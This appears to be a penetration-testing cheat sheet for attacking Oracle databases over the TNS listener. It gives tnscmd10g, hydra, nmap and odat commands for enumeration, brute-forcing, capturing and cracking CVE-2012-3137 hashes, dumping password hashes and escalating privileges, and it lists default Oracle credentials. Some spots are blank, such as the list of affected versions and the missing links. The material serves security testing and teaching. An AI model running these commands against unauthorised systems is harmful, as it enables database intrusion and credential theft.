Oracle clients communicate with the database using the Transparent Network Substrate (TNS) protocol. When the listener receives a connection request (1521/TCP, -you may also get secondary listeners on 1522–1529-), it starts up a new database process and establishes a connection between the client and the Oracle database.
Enumerate version
Using nmap scripts, we can enumerate the version of the TNS-Listener
We can enumerate the TNS-Listener using the tnscmd10g tool
tnscmd10g version -p 1521 -h <IP>
Commands & Brute-force
When enumerating Oracle the first step is to talk to the TNS-Listener
# Return the current status and variables used by the listener
tnscmd10g status -p 1521 -h <IP>
# Dump service data
tnscmd10g services -p 1521 -h <IP>
# Dump debugging information to the listener log
tnscmd10g debug -p 1521 -h <IP>
# Write the listener configuration file to a backup location
tnscmd10g save_config -p 1521 -h <IP>
If you receive an error, could be because TNS versions are incompatible (Use the --10G parameter with tnscmd10) and if the error persist, the listener may be password protected
We can use hydra to brute-force TNS-Listener password
The SID (Service Identifier) is essentially the database name, depending on the install you may have one or more default SIDs, or even a totally custom dba defined SID.
Here are mixed wordlists taken from hacktricks and some interesting other wordlists
# User/Password list
cat /usr/share/nmap/nselib/data/oracle-default-accounts.lst
# User Password list
cat /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt
# User/Password list
cat /usr/share/oscanner/accounts.default
Below are some of the default passwords associated with Oracle:
DBSNMP/DBSNMP — Intelligent Agent uses this to talk to the db server (its some work to change it)
SYS/CHANGE_ON_INSTALL — Default sysdba account before and including Oracle v9, as of version 10g this has to be different!
PCMS_SYS/PCMS_SYS — Default x account
WMSYS/WMSYS — Default x account
OUTLN/OUTLN — Default x account
SCOTT/TIGER — Default x account
Other default passwords can be found here and here
Stealremotepwds - CVE-2012-3137
The versions,,,, and are vulnerable to this technique
Using nmap we can retreive intercept the initial traffic during authorization phase and extract a hash to bruteforce it offline:
root@kali:~# nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n
Starting Nmap 6.49BETA4 ( at 2016-03-02 14:58 EST
Nmap scan report for
1521/tcp open oracle
| oracle-brute-stealth:
| Accounts
| SYS:$o5logon$1245C95384E15E7F0C893FCD1893D8E19078170867E892CE86DF90880E09FAD3B4832CBCFDAC1
| A821D2EA8E3D2209DB6*4202433F49DE9AE72AE2 -
| Hashed valid or invalid credentials
| Statistics
|_ Performed 241 guesses in 12 seconds, average tps: 20
john hashes.txt
Also, we can use odat
# Test module
odat stealremotepwds -s <IP> -U <username> -P <password> -d <SID> --test-module
# Obtain the session key and salt for user list
odat stealremotepwds -s <IP> -U <username> -P <password> -d <SID> --get-all-passwords --user-list /usr/share/nmap/nselib/data/oracle-default-accounts.lst
Dump Oracle Hashes
Password hashes in Oracle are stored in the sys.users$ or dba_users tables. With permissions, we can extract them using odat
You may want to add the --sysdba to make it works
# Test the module before use it
odat passwordstealer -s <IP> -U <username> -P <password> -d <SID> --test-module
# Dump hashes
odat passwordstealer -s <IP> -U <username> -P <password> -d <SID> --get-passwords
# Dump hashes indirectly with CVE-2020-2984 for 12c or higher
odat passwordstealer -s <IP> -U <username> -P <password> -d <SID> --get-passwords-ocm
# Dump hashes from history
odat passwordstealer -s <IP> -U <username> -P <password> -d <SID> --get-passwords-from-history
# Dump hashes with DBMS_STAT
odat passwordstealer -s <IP> -U <username> -P <password> -d <SID> --get-passwords-dbms-stats
Logging into a Remote Database
To login using known credentials, we can use sqlplus
ODAT requires the privilege ‘CREATE ANY DIRECTORY’, which, by default, is granted only to DBA role, since it attempts to execute the file from any and not only “your” directory (the manual version of this attack requires less privileges).
Read/Write files
We can try to read/write files using odat and utlfile
We may use the privesc module from odat to escalate our privileges on the DB. On that link you will find several ways to escalate privileges using odat.
An interesting tool is oscanner, which will try to get some valid SID and then it will brute-force for valid credentials and try to extract some information:
# Bruteforce SID and check all
odat all -s <IP> -p <PORT>
# Bruteforce accounts for that SID and check all
odat all -s <IP> -p <PORT> -d <SID>
# Check all for that acccount
odat all -s <IP> -p <PORT> -d <SID> -U <USER> -P <PASSWORD>
# Check all for that acccount as SYSDBA or SYSOPER
odat all -s <IP> -p <PORT> -d <SID> -U <USER> -P <PASSWORD> --sysdba
odat all -s <IP> -p <PORT> -d <SID> -U <USER> -P <PASSWORD> --sysoper